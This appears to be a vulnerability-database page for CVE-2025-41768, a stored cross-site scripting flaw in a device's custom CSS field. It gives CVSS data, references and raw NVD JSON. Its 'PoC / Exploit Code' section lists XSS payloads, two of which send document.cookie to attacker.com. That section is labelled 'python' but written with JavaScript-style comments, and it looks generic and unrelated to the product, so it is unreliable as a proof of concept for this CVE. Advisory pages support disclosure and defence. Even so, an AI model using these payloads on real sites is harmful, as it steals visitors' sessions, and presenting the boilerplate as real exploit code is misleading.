CVE-2025-41768

Description

An high privileged remote attacker can inject arbitrary content into the custom CSS field on the affected devices due to improper neutralization of input during web page generation ('Cross-site Scripting').

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

受影响设备的自定义CSS功能固件版本 < 修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-41768 Stored XSS PoC
// Target: Device Custom CSS Field

// Login to the device admin panel first
// Then navigate to Custom CSS settings

// Inject the following payload in the CSS field:
const xssPayload = '<svg/onload=fetch("https://attacker.com/steal?c="+document.cookie)>';

// Alternative payloads:
// 1. Basic alert test:
// <script>alert(document.domain)</script>

// 2. Cookie stealing:
// <img src=x onerror="this.src='https://attacker.com/?c='+document.cookie">

// 3. DOM manipulation:
// <script>document.body.innerHTML='<h1>Pwned</h1>'</script>

// After injecting, any user viewing the affected page will trigger the payload

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41768
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41768
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41768/
[4] VulDB https://vuldb.com/cve/CVE-2025-41768
[5] https://certvde.com/de/advisories/VDE-2025-106

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41768", "sourceIdentifier": "[email protected]", "published": "2026-01-20T09:15:59.123", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An high privileged remote attacker can inject arbitrary content into the custom CSS field on the affected devices due to improper neutralization of input during web page generation ('Cross-site Scripting')."}, {"lang": "es", "value": "En una instancia de TwinCAT 3 HMI Servidor ejecutándose en un dispositivo, un administrador autenticado puede inyectar contenido arbitrario en el campo CSS personalizado, que se persiste en el dispositivo y luego es devuelto a través de la página de inicio de sesión y la página de error."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2025-106", "source": "[email protected]"}]}}